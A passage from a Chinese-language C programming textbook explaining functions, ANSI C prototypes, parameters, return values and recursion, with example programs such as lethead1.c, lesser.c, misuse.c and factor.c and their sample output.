中的函数、子程序、过程作用相同,但是细节上略有不同。一些函数执行某 些动作,如printf()把数据打印到屏幕上;一些函数找出一个值供程序使用, 如strlen()把指定字符串的长度返回给程序。一般而言,函数可以同时具备以 上两种功能。 为什么要使用函数?首先,使用函数可以省去编写重复代码的苦差。如 果程序要多次完成某项任务,那么只需编写一个合适的函数,就可以在需要 时使用这个函数,或者在不同的程序中使用该函数,就像许多程序中使用 putchar()一样。其次,即使程序只完成某项任务一次,也值得使用函数。因 为函数让程序更加模块化,从而提高了程序代码的可读性,更方便后期修 改、完善。例如,假设要编写一个程序完成以下任务: 读入一系列数字; 分类这些数字; 找出这些数字的平均值; 打印一份柱状图。 可以使用下面的程序: #include <stdio.h> #define SIZE 50 int main(void) { 562 float list[SIZE]; readlist(list, SIZE); sort(list, SIZE); average(list, SIZE); bargraph(list, SIZE); return 0; } 当然,还要编写4个函数readlist()、sort()、average()和bargraph()的实现 细节。描述性的函数名能清楚地表达函数的用途和组织结构。然后,单独设 计和测试每个函数,直到函数都能正常完成任务。如果这些函数够通用,还 可以用于其他程序。 许多程序员喜欢把函数看作是根据传入信息(输入)及其生成的值或响 应的动作(输出)来定义的“黑盒”。如果不是自己编写函数,根本不用关心 黑盒的内部行为。例如,使用printf()时,只需知道给该函数传入格式字符串 或一些参数以及 printf()生成的输出,无需了解 printf()的内部代码。以这种 方式看待函数有助于把注意力集中在程序的整体设计,而不是函数的实现细 节上。因此,在动手编写代码之前,仔细考虑一下函数应该完成什么任务, 以及函数和程序整体的关系。 如何了解函数?首先要知道如何正确地定义函数、如何调用函数和如何 建立函数间的通信。我们从一个简单的程序示例开始,帮助读者理清这些内 容,然后再详细讲解。 9.1.1 创建并使用简单函数 我们的第1个目标是创建一个在一行打印40个星号的函数,并在一个打 563 印表头的程序中使用该函数。如程序清单9.1所示,该程序由main()和 starbar()组成。 程序清单9.1 lethead1.c程序 /* lethead1.c */ #include <stdio.h> #define NAME "GIGATHINK, INC." #define ADDRESS "101 Megabuck Plaza" #define PLACE "Megapolis, CA 94904" #define WIDTH 40 void starbar(void); /* 函数原型 */ int main(void) { starbar(); printf("%s\n", NAME); printf("%s\n", ADDRESS); printf("%s\n", PLACE); starbar();   /* 使用函数 */ return 0; } 564 void starbar(void) /* 定义函数  */ { int count; for (count = 1; count <= WIDTH; count++) putchar('*'); putchar('\n'); } 该程序的输出如下: **************************************** GIGATHINK, INC. 101 Megabuck Plaza Megapolis, CA 94904 **************************************** 9.1.2 分析程序 该程序要注意以下几点。 程序在3处使用了starbar标识符:函数原型(function prototype)告诉编 译器函数starbar()的类型;函数调用(function call)表明在此处执行函数; 函数定义(function definition)明确地指定了函数要做什么。 函数和变量一样,有多种类型。任何程序在使用函数之前都要声明该函 数的类型。因此,在main()函数定义的前面出现了下面的ANSI C风格的函数 565 原型: void starbar(void); 圆括号表明starbar是一个函数名。第1个void是函数类型,void类型表明 函数没有返回值。第2个void(在圆括号中)表明该函数不带参数。分号表 明这是在声明函数,不是定义函数。也就是说,这行声明了程序将使用一个 名为starbar()、没有返回值、没有参数的函数,并告诉编译器在别处查找该 函数的定义。对于不识别ANSI C风格原型的编译器,只需声明函数的类 型,如下所示: void starbar(); 注意,一些老版本的编译器甚至连void都识别不了。如果使用这种编译 器,就要把没有返回值的函数声明为int类型。当然,最好还是换一个新的编 译器。 一般而言,函数原型指明了函数的返回值类型和函数接受的参数类型。 这些信息称为该函数的签名(signature)。对于starbar()函数而言,其签名是 该函数没有返回值,没有参数。 程序把 starbar()原型置于 main()的前面。当然,也可以放在 main()里面 的声明变量处。放在哪个位置都可以。 在main()中,执行到下面的语句时调用了starbar()函数: starbar(); 这是调用void类型函数的一种形式。当计算机执行到starbar();语句时, 会找到该函数的定义并执行其中的内容。执行完starbar()中的代码后,计算 机返回主调函数(calling function)继续执行下一行(本例中,主调函数是 main()),见图9.1(更确切地说,编译器把C程序翻译成执行以上操作的机 器语言代码)。 566 程序中strarbar()和main()的定义形式相同。首先函数头包括函数类型、 函数名和圆括号,接着是左花括号、变量声明、函数表达式语句,最后以右 花括号结束(见图9.2)。注意,函数头中的starbar()后面没有分号,告诉编 译器这是定义starbar(),而不是调用函数或声明函数原型。 程序把 starbar()和 main()放在一个文件中。当然,也可以把它们分别放 在两个文件中。把函数都放在一个文件中的单文件形式比较容易编译,而使 用多个文件方便在不同的程序中使用同一个函数。如果把函数放在一个单独 的文件中,要把#define 和#include 指令也放入该文件。我们稍后会讨论使用 多个文件的情况。现在,先把所有的函数都放在一个文件中。main()的右花 括号告诉编译器该函数结束的位置,后面的starbar()函数头告诉编译器 starbar()是一个函数。 567 图9.1 lethead1.c(程序清单9.1)的程序流 568 图9.2 简单函数的结构 starbar()函数中的变量count是局部变量(local variable),意思是该变 量只属于starbar()函数。可以在程序中的其他地方(包括main()中)使用 count,这不会引起名称冲突,它们是同名的不同变量。 如果把starbar()看作是一个黑盒,那么它的行为是打印一行星号。不用 给该函数提供任何输入,因为调用它不需要其他信息。而且,它没有返回 值,所以也不给 main()提供(或返回)任何信息。简而言之,starbar()不需 要与主调函数通信。 接下来介绍一个函数间需要通信的例子。 9.1.3 函数参数 在程序清单9.1的输出中,如果文字能居中,信头会更加美观。可以通 569 过在打印文字之前打印一定数量的空格来实现,这和打印一定数量的星号 (starbar()函数)类似,只不过现在要打印的是一定数量的空格。虽然这是 两个任务,但是任务非常相似,与其分别为它们编写一个函数,不如写一个 更通用的函数,可以在两种情况下使用。我们设计一个新的函数 show_n_char()(显示一个字符n次)。唯一要改变的是使用内置的值来显示 字符和重复的次数,show_n_char()将使用函数参数来传递这些值。 我们来具体分析。假设可用的空间是40个字符宽。调用show_n_char('*', 40)应该正好打印一行40个星号,就像starbar()之前做的那样。第2行 GIGATHINK, INT.的空格怎么处理?GIGATHINK, INT.是15个字符宽,所以 第1个版本中,文字后面有25个空格。为了让文字居中,文字的左侧应该有 12个空格,右侧有13个空格。因此,可以调用show_n_char('*', 12)。 show_n_char()与starbar()很相似,但是show_n_char()带有参数。从功能 上看,前者不会添加换行符,而后者会,因为show_n_char()要把空格和文本 打印成一行。程序清单9.2是修改后的版本。为强调参数的工作原理,程序 使用了不同的参数形式。 程序清单9.2 lethead2.c程序 /* lethead2.c */ #include <stdio.h> #include <string.h>     /* 为strlen()提供原型 */ #define NAME "GIGATHINK, INC." #define ADDRESS "101 Megabuck Plaza" #define PLACE "Megapolis, CA 94904" #define WIDTH 40 #define SPACE ' ' 570 void show_n_char(char ch, int num); int main(void) { int spaces; show_n_char('*', WIDTH);        /* 用符号常量作为参数 */ putchar('\n'); show_n_char(SPACE, 12);         /* 用符号常量作为参数 */ printf("%s\n", NAME); spaces = (WIDTH - strlen(ADDRESS)) / 2; /* 计算要跳过多少个空格*/ show_n_char(SPACE, spaces);       /* 用一个变量作为参数*/ printf("%s\n", ADDRESS); show_n_char(SPACE, (WIDTH - strlen(PLACE)) / 2); printf("%s\n", PLACE);         /* 用一个表达式作为参数  */ show_n_char('*', WIDTH); putchar('\n'); return 0; } /* show_n_char()函数的定义 */ 571 void show_n_char(char ch, int num) { int count; for (count = 1; count <= num; count++) putchar(ch); } 该函数的运行结果如下: **************************************** GIGATHINK, INC. 101 Megabuck Plaza Megapolis, CA 94904 **************************************** 下面我们回顾一下如何编写一个带参数的函数,然后介绍这种函数的用 法。 9.1.4 定义带形式参数的函数 函数定义从下面的ANSI C风格的函数头开始: void show_n_char(char ch, int num) 该行告知编译器show_n_char()使用两个参数ch和num,ch是char类型, num是int类型。这两个变量被称为形式参数(formal argument,但是最近的标 准推荐使用formal parameter),简称形参。和定义在函数中变量一样,形式 572 参数也是局部变量,属该函数私有。这意味着在其他函数中使用同名变量不 会引起名称冲突。每次调用函数,就会给这些变量赋值。 注意,ANSI C要求在每个变量前都声明其类型。也就是说,不能像普 通变量声明那样使用同一类型的变量列表: void dibs(int x, y, z)     /* 无效的函数头 */ void dubs(int x, int y, int z) /* 有效的函数头 */ ANSI C也接受ANSI C之前的形式,但是将其视为废弃不用的形式: void show_n_char(ch, num) char ch; int num; 这里,圆括号中只有参数名列表,而参数的类型在后面声明。注意,普 通的局部变量在左花括号之后声明,而上面的变量在函数左花括号之前声 明。如果变量是同一类型,这种形式可以用逗号分隔变量名列表,如下所 示: void dibs(x, y, z) int x, y, z;   /* 有效 */ 当前的标准正逐渐淘汰 ANSI 之前的形式。读者应对此有所了解,以便 能看懂以前编写的程序,但是自己编写程序时应使用现在的标准形式(C99 和C11标准继续警告这些过时的用法即将被淘汰)。 虽然show_n_char()接受来自main()的值,但是它没有返回值。因此, show_n_char()的类型是void。 下面,我们来学习如何使用函数。 573 9.1.5 声明带形式参数函数的原型 在使用函数之前,要用ANSI C形式声明函数原型: void show_n_char(char ch, int num); 当函数接受参数时,函数原型用逗号分隔的列表指明参数的数量和类 型。根据个人喜好,你也可以省略变量名: void show_n_char(char, int); 在原型中使用变量名并没有实际创建变量,char仅代表了一个char类型 的变量,以此类推。再次提醒读者注意,ANSI C也接受过去的声明函数形 式,即圆括号内没有参数列表: void show_n_char(); 这种形式最终会从标准中剔除。即使没有被剔除,现在函数原型的设计 也更有优势(稍后会介绍)。了解这种形式的写法是为了以后读得懂以前写 的代码。 9.1.6 调用带实际参数的函数 在函数调用中,实际参数(actual argument,简称实参)提供了ch和num 的值。考虑程序清单9.2中第1次调用show_n_char(): show_n_char(SPACE, 12); 实际参数是空格字符和12。这两个值被赋给show_n_char()中相应的形式 参数:变量ch和num。简而言之,形式参数是被调函数(called function)中 的变量,实际参数是主调函数(calling function)赋给被调函数的具体值。 如上例所示,实际参数可以是常量、变量,或甚至是更复杂的表达式。无论 实际参数是何种形式都要被求值,然后该值被拷贝给被调函数相应的形式参 数。以程序清单 9.2 中最后一次调用show_n_char()为例: 574 show_n_char(SPACE, (WIDTH - strlen(PLACE)) / 2); 构成该函数第2个实际参数的是一个很长的表达式,对该表达式求值为 10。然后,10被赋给变量num。被调函数不知道也不关心传入的数值是来自 常量、变量还是一般表达式。再次强调,实际参数是具体的值,该值要被赋 给作为形式参数的变量(见图 9.3)。因为被调函数使用的值是从主调函数 中拷贝而来,所以无论被调函数对拷贝数据进行什么操作,都不会影响主调 函数中的原始数据。 注意 实际参数和形式参数 实际参数是出现在函数调用圆括号中的表达式。形式参数是函数定义的 函数头中声明的变量。调用函数时,创建了声明为形式参数的变量并初始化 为实际参数的求值结果。程序清单 9.2 中,'*'和WIDTH都是第1次调用 show_n_char()时的实际参数,而SPACE和11是第2次调用show_n_char()时的 实际参数。在函数定义中,ch和num都是该函数的形式参数。 575 图9.3 形式参数和实际参数 9.1.7 黑盒视角 从黑盒的视角看 show_n_char(),待显示的字符和显示的次数是输入。 执行后的结果是打印指定数量的字符。输入以参数的形式被传递给函数。这 些信息清楚地表明了如何在 main()中使用该函数。而且,这也可以作为编写 该函数的设计说明。 黑盒方法的核心部分是:ch、num和count都是show_n_char()私有的局部 变量。如果在main()中使用同名变量,那么它们相互独立,互不影响。也就 是说,如果main()有一个count变量,那么改变它的值不会改变show_n_char() 中的count,反之亦然。黑盒里发生了什么对主调函数是不可见的。 576 9.1.8 使用return从函数中返回值 前面介绍了如何把信息从主调函数传递给被调函数。反过来,函数的返 回值可以把信息从被调函数传回主调函数。为进一步说明,我们将创建一个 返回两个参数中较小值的函数。由于函数被设计用来处理int类型的值,所以 被命名为imin()。另外,还要创建一个简单的main(),用于检查imin()是否正 常工作。这种被设计用于测试函数的程序有时被称为驱动程序(driver), 该驱动程序调用一个函数。如果函数成功通过了测试,就可以安装在一个更 重要的程序中使用。程序清单9.3演示了这个驱动程序和返回最小值的函 数。 程序清单9.3 lesser.c程序 /* lesser.c -- 找出两个整数中较小的一个 */ #include <stdio.h> int imin(int, int); int main(void) { int evil1, evil2; printf("Enter a pair of integers (q to quit):\n"); while (scanf("%d %d", &evil1, &evil2) == 2) { printf("The lesser of %d and %d is %d.\n", evil1, evil2, imin(evil1, evil2)); printf("Enter a pair of integers (q to quit):\n"); 577 } printf("Bye.\n"); return 0; } int imin(int n, int m) { int min; if (n < m) min = n; else min = m; return min; } 回忆一下,scanf()返回成功读数据的个数,所以如果输入不是两个整数 会导致循环终止。下面是一个运行示例: Enter a pair of integers (q to quit): 509 333 The lesser of 509 and 333 is 333. Enter a pair of integers (q to quit): 578 -9393 6 The lesser of -9393 and 6 is -9393. Enter a pair of integers (q to quit): q Bye. 关键字return后面的表达式的值就是函数的返回值。在该例中,该函数 返回的值就是变量min的值。因为min是int类型的变量,所以imin()函数的类 型也是int。 变量min属于imin()函数私有,但是return语句把min的值传回了主调函 数。下面这条语句的作用是把min的值赋给lesser: lesser = imin(n,m); 是否能像写成下面这样: imin(n,m); lesser = min; 不能。因为主调函数甚至不知道min的存在。记住,imin()中的变量是 imin()的局部变量。函数调用imin(evil1, evil2)只是把两个变量的值拷贝了一 份。 返回值不仅可以赋给变量,也可以被用作表达式的一部分。例如,可以 这样: answer = 2 * imin(z, zstar) + 25; printf("%d\n", imin(-32 + answer, LIMIT)); 579 返回值不一定是变量的值,也可以是任意表达式的值。例如,可以用以 下的代码简化程序示例: /* 返回最小值的函数,第2个版本 */ imin(int n,int m) { return (n < m) ? n : m; } 条件表达式的值是n和m中的较小者,该值要被返回给主调函数。虽然 这里不要求用圆括号把返回值括起来,但是如果想让程序条理更清楚或统一 风格,可以把返回值放在圆括号内。 如果函数返回值的类型与函数声明的类型不匹配会怎样? int what_if(int n) { double z = 100.0 / (double) n; return z; // 会发生什么? } 实际得到的返回值相当于把函数中指定的返回值赋给与函数类型相同的 变量所得到的值。因此在本例中,相当于把z的值赋给int类型的变量,然后 返回int类型变量的值。例如,假设有下面的函数调用: result = what_if(64); 虽然在what_if()函数中赋给z的值是1.5625,但是return语句返回确实int 580 类型的值1。 使用 return 语句的另一个作用是,终止函数并把控制返回给主调函数的 下一条语句。因此,可以这样编写imin(): /*返回最小值的函数,第3个版本*/ imin(int n,int m) { if (n < m) return n; else return m; } 许多C程序员都认为只在函数末尾使用一次return语句比较好,因为这样 做更方便浏览程序的人理解函数的控制流。但是,在函数中使用多个return 语句也没有错。无论如何,对用户而言,这3个版本的函数用起来都一样, 因为所有的输入和输出都完全相同,不同的是函数内部的实现细节。下面的 版本也没问题: /*返回最小值的函数,第4个版本*/ imin(int n, int m) { if (n < m) return n; 581 else return m; printf("Professor Fleppard is like totally a fopdoodle.\n"); } return语句导致printf()语句永远不会被执行。如果Fleppard教授在自己的 程序中使用这个版本的函数,可能永远不知道编写这个函数的学生对他的看 法。 另外,还可以这样使用return: return; 这条语句会导致终止函数,并把控制返回给主调函数。因为 return 后面 没有任何表达式,所以没有返回值,只有在void函数中才会用到这种形式。 9.1.9 函数类型 声明函数时必须声明函数的类型。带返回值的函数类型应该与其返回值 类型相同,而没有返回值的函数应声明为void类型。如果没有声明函数的类 型,旧版本的C编译器会假定函数的类型是int。这一惯例源于C的早期,那 时的函数绝大多数都是int类型。然而,C99标准不再支持int类型函数的这种 假定设置。 类型声明是函数定义的一部分。要记住,函数类型指的是返回值的类 型,不是函数参数的类型。例如,下面的函数头定义了一个带两个int类型参 数的函数,但是其返回值是double类型。 double klink(int a, int b) 要正确地使用函数,程序在第 1 次使用函数之前必须知道函数的类型。 方法之一是,把完整的函数定义放在第1次调用函数的前面。然而,这种方 582 法增加了程序的阅读难度。而且,要使用的函数可能在C库或其他文件中。 因此,通常的做法是提前声明函数,把函数的信息告知编译器。例如,程序 清单 9.3 中的main()函数包含以下几行代码: #include <stdio.h> int imin(int, int); int main(void) { int evil1, evil2, lesser; 第2行代码说明imin是一个函数名,有两个int类型的形参,且返回int类 型的值。现在,编译器在程序中调用imin()函数时就知道应该如何处理。 在程序清单9.3中,我们把函数的前置声明放在主调函数外面。当然, 也可以放在主调函数里面。例如,重写lesser.c(程序清单9.3)的开头部 分: #include <stdio.h> int main(void) { int imin(int, int); /* 声明imin()函数的原型*/ int evil1, evil2, lesser; 注意在这两种情况中,函数原型都声明在使用函数之前。 ANSI C标准库中,函数被分成多个系列,每一系列都有各自的头文 件。这些头文件中除了其他内容,还包含了本系列所有函数的声明。例如, stdio.h 头文件包含了标准 I/O 库函数(如,printf()和scanf())的声明。math.h 583 头文件包含了各种数学函数的声明。例如,下面的声明: double sqrt(double); 告知编译器sqrt()函数有一个double类型的形参,而且返回double类型的 值。不要混淆函数的声明和定义。函数声明告知编译器函数的类型,而函数 定义则提供实际的代码。在程序中包含 math.h 头文件告知编译器:sqrt()返 回double类型,但是sqrt()函数的代码在另一个库函数的文件中。 584 9.2 ANSI C函数原型 在ANSI C标准之前,声明函数的方案有缺陷,因为只需要声明函数的 类型,不用声明任何参数。下面我们看一下使用旧式的函数声明会导致什么 问题。 下面是ANSI之前的函数声明,告知编译器imin()返回int类型的值: int imin(); 然而,以上函数声明并未给出imin()函数的参数个数和类型。因此,如 果调用imin()时使用的参数个数不对或类型不匹配,编译器根本不会察觉出 来。 9.2.1 问题所在 我们看看与imax()函数相关的一些示例,该函数与imin()函数关系密 切。程序清单9.4演示了一个程序,用过去声明函数的方式声明了imax()函 数,然后错误地使用该函数。 程序清单9.4 misuse.c程序 /* misuse.c -- 错误地使用函数 */ #include <stdio.h> int imax();   /* 旧式函数声明 */ int main(void) { printf("The maximum of %d and %d is %d.\n",3, 5, imax(3)); printf("The maximum of %d and %d is %d.\n",3, 5,  585 imax(3.0, 5.0)); return 0; } int imax(n, m) int n, m; { return (n > m ? n : m); } 第1次调用printf()时省略了imax()的一个参数,第2次调用printf()时用两 个浮点参数而不是整数参数。尽管有些问题,但程序可以编译和运行。 下面是使用Xcode 4.6运行的输出示例: The maximum of 3 and 5 is 1606416656. The maximum of 3 and 5 is 3886. 使用gcc运行该程序,输出的值是1359379472和1359377160。这两个编 译器都运行正常,之所以输出错误的结果,是因为它们运行的程序没有使用 函数原型。 到底是哪里出了问题?由于不同系统的内部机制不同,所以出现问题的 具体情况也不同。下面介绍的是使用P C和VA X的情况。主调函数把它的参 数储存在被称为栈(stack)的临时存储区,被调函数从栈中读取这些参数。 对于该例,这两个过程并未相互协调。主调函数根据函数调用中的实际参数 决定传递的类型,而被调函数根据它的形式参数读取值。因此,函数调用 imax(3)把一个整数放在栈中。当imax()函数开始执行时,它从栈中读取两个 586 整数。而实际上栈中只存放了一个待读取的整数,所以读取的第 2 个值是当 时恰好在栈中的其他值。 第2次使用imax()函数时,它传递的是float类型的值。这次把两个double 类型的值放在栈中(回忆一下,当float类型被作为参数传递时会被升级为 double类型)。在我们的系统中,两个double类型的值就是两个64位的值, 所以128位的数据被放在栈中。当imax()从栈中读取两个int类型的值时,它 从栈中读取前64位。在我们的系统中,每个int类型的变量占用32位。这些数 据对应两个整数,其中较大的是3886。 9.2.2 ANSI的解决方案 针对参数不匹配的问题,ANSI C标准要求在函数声明时还要声明变量 的类型,即使用函数原型(function prototype)来声明函数的返回类型、参 数的数量和每个参数的类型。未标明 imax()函数有两个 int 类型的参数,可 以使用下面两种函数原型来声明: int imax(int, int); int imax(int a, int b); 第1种形式使用以逗号分隔的类型列表,第2种形式在类型后面添加了变 量名。注意,这里的变量名是假名,不必与函数定义的形式参数名一致。 有了这些信息,编译器可以检查函数调用是否与函数原型匹配。参数的 数量是否正确?参数的类型是否匹配?以 imax()为例,如果两个参数都是数 字,但是类型不匹配,编译器会把实际参数的类型转换成形式参数的类型。 例如,imax(3.0, 5.0)会被转换成imax(3, 5)。我们用函数原型替换程序清单9.4 中的函数声明,如程序清单9.5所示。 程序清单9.5 proto.c程序 /* proto.c -- 使用函数原型 */ 587 #include <stdio.h> int imax(int, int);    /* 函数原型 */ int main(void) { printf("The maximum of %d and %d is %d.\n", 3, 5, imax(3)); printf("The maximum of %d and %d is %d.\n", 3, 5, imax(3.0, 5.0)); return 0; } int imax(int n, int m) { return (n > m ? n : m); } 编译程序清单9.5时,我们的编译器给出调用的imax()函数参数太少的错 误消息。 如果是类型不匹配会怎样?为探索这个问题,我们用imax(3, 5)替换 imax(3),然后再次编译该程序。这次编译器没有给出任何错误信息,程序 的输出如下: The maximum of 3 and 5 is 5. 588 The maximum of 3 and 5 is 5. 如上文所述,第2次调用中的3.0和5.0被转换成3和5,以便函数能正确地 处理输入。 虽然没有错误消息,但是我们的编译器还是给出了警告:double转换成 int可能会导致丢失数据。例如,下面的函数调用: imax(3.9, 5.4) 相当于: imax(3, 5) 错误和警告的区别是:错误导致无法编译,而警告仍然允许编译。一些 编译器在进行类似的类型转换时不会通知用户,因为C标准中对此未作要 求。不过,许多编译器都允许用户选择警告级别来控制编译器在描述警告时 的详细程度。 9.2.3 无参数和未指定参数 假设有下面的函数原型: void print_name(); 一个支持ANSI C的编译器会假定用户没有用函数原型来声明函数,它 将不会检查参数。为了表明函数确实没有参数,应该在圆括号中使用void关 键字: void print_name(void); 支持ANSI C的编译器解释为print_name()不接受任何参数。然后在调用 该函数时,编译器会检查以确保没有使用参数。 一些函数接受(如,printf()和scanf())许多参数。例如对于printf(),第1 589 个参数是字符串,但是其余参数的类型和数量都不固定。对于这种情况, ANSI C允许使用部分原型。例如,对于printf()可以使用下面的原型: int printf(const char *, ...); 这种原型表明,第1个参数是一个字符串(第11章中将详细介绍),可 能还有其他未指定的参数。 C库通过stdarg.h头文件提供了一个定义这类(形参数量不固定的)函数 的标准方法。第16章中详细介绍相关内容。 9.2.4 函数原型的优点 函数原型是C语言的一个强有力的工具,它让编译器捕获在使用函数时 可能出现的许多错误或疏漏。如果编译器没有发现这些问题,就很难觉察出 来。是否必须使用函数原型?不一定。你也可以使用旧式的函数声明(即不 用声明任何形参),但是这样做的弊大于利。 有一种方法可以省略函数原型却保留函数原型的优点。首先要明白,之 所以使用函数原型,是为了让编译器在第1次执行到该函数之前就知道如何 使用它。因此,把整个函数定义放在第1次调用该函数之前,也有相同的效 果。此时,函数定义也相当于函数原型。对于较小的函数,这种用法很普 遍: // 下面这行代码既是函数定义,也是函数原型 int imax(int a, int b) { return a > b ? a : b; } int main() { int x, z; ... 590 z = imax(x, 50); ... } 591 9.3 递归 C允许函数调用它自己,这种调用过程称为递归(recursion)。递归有 时难以捉摸,有时却很方便实用。结束递归是使用递归的难点,因为如果递 归代码中没有终止递归的条件测试部分,一个调用自己的函数会无限递归。 可以使用循环的地方通常都可以使用递归。有时用循环解决问题比较 好,但有时用递归更好。递归方案更简洁,但效率却没有循环高。 9.3.1 演示递归 我们通过一个程序示例,来学习什么是递归。程序清单 9.6 中的 main() 函数调用 up_and_down()函数,这次调用称为“第1级递归”。然后 up_and_down()调用自己,这次调用称为“第2级递归”。接着第2级递归调用 第3级递归,以此类推。该程序示例共有4级递归。为了进一步深入研究递归 时发生了什么,程序不仅显示了变量n的值,还显示了储存n的内存地址 &n(。本章稍后会详细讨论&运算符,printf()函数使用%p转换说明打印地 址,如果你的系统不支持这种格式,请使用%u或%lu代替%p)。 程序清单9.6 recur.c程序 /* recur.c -- 递归演示 */ #include <stdio.h> void up_and_down(int); int main(void) { up_and_down(1); return 0; 592 } void up_and_down(int n) { printf("Level %d: n location %p\n", n, &n); // #1 if (n < 4) up_and_down(n + 1); printf("LEVEL %d: n location %p\n", n, &n); // #2 } 下面是在我们系统中的输出: Level 1: n location 0x0012ff48 Level 2: n location 0x0012ff3c Level 3: n location 0x0012ff30 Level 4: n location 0x0012ff24 LEVEL 4: n location 0x0012ff24 LEVEL 3: n location 0x0012ff30 LEVEL 2: n location 0x0012ff3c LEVEL 1: n location 0x0012ff48 我们来仔细分析程序中的递归是如何工作的。首先,main()调用了带参 数1的up_and_down()函数,执行结果是up_and_down()中的形式参数n的值是 1,所以打印语句#1打印Level 1。然后,由于n小于4,up_and_down()(第1 593 级)调用实际参数为n + 1(或2)的up_and_down()(第2级)。于是第2级调 用中的n的值是2,打印语句#1打印Level 2。与此类似,下面两次调用打印的 分别是Level 3和Level 4。 当执行到第4级时,n的值是4,所以if测试条件为假。up_and_down()函 数不再调用自己。第4级调用接着执行打印语句#2,即打印LEVEL 4,因为n 的值是4。此时,第4级调用结束,控制被传回它的主调函数(即第3级调 用)。在第3级调用中,执行的最后一条语句是调用if语句中的第4级调用。 被调函数(第4级调用)把控制返回在这个位置,因此,第3级调用继续执行 后面的代码,打印语句#2打印LEVEL 3。然后第3级调用结束,控制被传回 第2级调用,接着打印LEVEL 2,以此类推。 注意,每级递归的变量 n 都属于本级递归私有。这从程序输出的地址值 可以看出(当然,不同的系统表示的地址格式不同,这里关键要注意, Level 1和LEVEL 1的地址相同,Level 2和LEVEL 2的地址相同,等等)。 如果觉得不好理解,可以假设有一条函数调用链——fun1()调用 fun2()、fun2()调用 fun3()、fun3()调用fun4()。当 fun4()结束时,控制传回 fun3();当fun3()结束时,控制传回 fun2();当fun2()结束时,控制传回 fun1()。递归的情况与此类似,只不过fun1()、fun2()、fun3()和fun4()都是相同 的函数。 9.3.2 递归的基本原理 初次接触递归会觉得较难理解。为了帮助读者理解递归过程,下面以程 序清单9.6为例讲解几个要点。 第1,每级函数调用都有自己的变量。也就是说,第1级的n和第2级的n 不同,所以程序创建了4个单独的变量,每个变量名都是n,但是它们的值各 不相同。当程序最终返回 up_and_down()的第1 级调用时,最初的n仍然是它 的初值1(见图9.4)。 594 图9.4 递归中的变量 第2,每次函数调用都会返回一次。当函数执行完毕后,控制权将被传 回上一级递归。程序必须按顺序逐级返回递归,从某级up_and_down()返回 上一级的up_and_down(),不能跳级回到main()中的第1级调用。 第3,递归函数中位于递归调用之前的语句,均按被调函数的顺序执 行。例如,程序清单9.6中的打印语句#1位于递归调用之前,它按照递归的 顺序:第1级、第2级、第3级和第4级,被执行了4次。 第4,递归函数中位于递归调用之后的语句,均按被调函数相反的顺序 执行。例如,打印语句#2位于递归调用之后,其执行的顺序是第4级、第3 级、第2级、第1级。递归调用的这种特性在解决涉及相反顺序的编程问题时 很有用。稍后将介绍一个这样的例子。 第5,虽然每级递归都有自己的变量,但是并没有拷贝函数的代码。程 序按顺序执行函数中的代码,而递归调用就相当于又从头开始执行函数的代 码。除了为每次递归调用创建变量外,递归调用非常类似于一个循环语句。 实际上,递归有时可用循环来代替,循环有时也能用递归来代替。 595 最后,递归函数必须包含能让递归调用停止的语句。通常,递归函数都 使用if或其他等价的测试条件在函数形参等于某特定值时终止递归。为此, 每次递归调用的形参都要使用不同的值。例如,程序清单9.6中的 up_and_down(n)调用up_and_down(n+1)。最终,实际参数等于4时,if的测试 条件(n < 4)为假。 9.3.3 尾递归 最简单的递归形式是把递归调用置于函数的末尾,即正好在 return 语句 之前。这种形式的递归被称为尾递归(tail recursion),因为递归调用在函 数的末尾。尾递归是最简单的递归形式,因为它相当于循环。 下面要介绍的程序示例中,分别用循环和尾递归计算阶乘。一个正整数 的阶乘(factorial)是从1到该整数的所有整数的乘积。例如,3的阶乘(写 作3!)是1×2×3。另外,0!等于1,负数没有阶乘。程序清单9.7中,第1个 函数使用for循环计算阶乘,第2个函数使用递归计算阶乘。 程序清单9.7 factor.c程序 // factor.c -- 使用循环和递归计算阶乘 #include <stdio.h> long fact(int n); long rfact(int n); int main(void) { int num; printf("This program calculates factorials.\n"); 596 printf("Enter a value in the range 0-12 (q to quit):\n"); while (scanf("%d", &num) == 1) { if (num < 0) printf("No negative numbers, please.\n"); else if (num > 12) printf("Keep input under 13.\n"); else { printf("loop: %d factorial = %ld\n", num, fact(num)); printf("recursion: %d factorial = %ld\n", num, rfact(num)); } printf("Enter a value in the range 0-12 (q to quit):\n"); } printf("Bye.\n"); return 0; } 597 long fact(int n)   // 使用循环的函数 { long ans; for (ans = 1; n > 1; n--) ans *= n; return ans; } long rfact(int n)  // 使用递归的函数 { long ans; if (n > 0) ans = n * rfact(n - 1); else ans = 1; return ans; } 测试驱动程序把输入限制在0~12。因为12!已快接近5亿,而13!比62亿 还大,已超过我们系统中long类型能表示的范围。要计算超过12的阶乘,必 须使用能表示更大范围的类型,如double或long long。 下面是该程序的运行示例: 598 This program calculates factorials. Enter a value in the range 0-12 (q to quit): 5 loop: 5 factorial = 120 recursion: 5 factorial = 120 Enter a value in the range 0-12 (q to quit): 10 loop: 10 factorial = 3628800 recursion: 10 factorial = 3628800 Enter a value in the range 0-12 (q to quit): q Bye. 使用循环的函数把ans初始化为1,然后把ans与从n~2的所有递减整数相 乘。根据阶乘的公式,还应该乘以1,但是这并不会改变结果。 现在考虑使用递归的函数。该函数的关键是n! = n×(n-1)!。可以这样做 是因为(n-1)!是n-1~1的所有正整数的乘积。因此,n乘以n-1就得到n的阶乘。 阶乘的这一特性很适合使用递归。如果调用函数rfact(),rfact(n)是 n*rfact(n- 1)。因此,通过调用 rfact(n-1)来计算rfact(n),如程序清单9.7中所示。当 然,必须要在满足某条件时结束递归,可以在n等于0时把返回值设为1。 程序清单9.7中使用递归的输出和使用循环的输出相同。注意,虽然 rfact()的递归调用不是函数的最后一行,但是当n>0时,它是该函数执行的最 后一条语句,因此它也是尾递归。 599 既然用递归和循环来计算都没问题,那么到底应该使用哪一个?一般而 言,选择循环比较好。首先,每次递归都会创建一组变量,所以递归使用的 内存更多,而且每次递归调用都会把创建的一组新变量放在栈中。递归调用 的数量受限于内存空间。其次,由于每次函数调用要花费一定的时间,所以 递归的执行速度较慢。那么,演示这个程序示例的目的是什么?因为尾递归 是递归中最简单的形式,比较容易理解。在某些情况下,不能用简单的循环 代替递归,因此读者还是要好好理解递归。 9.3.4 递归和倒序计算 递归在处理倒序时非常方便(在解决这类问题中,递归比循环简单)。 我们要解决的问题是:编写一个函数,打印一个整数的二进制数。二进制表 示法根据 2 的幂来表示数字。例如,十进制数 234 实际上是 2×102+3×101+4×100,所以二进制数101实际上是1×22+0×21+1×20。二进制数 由0和1表示。 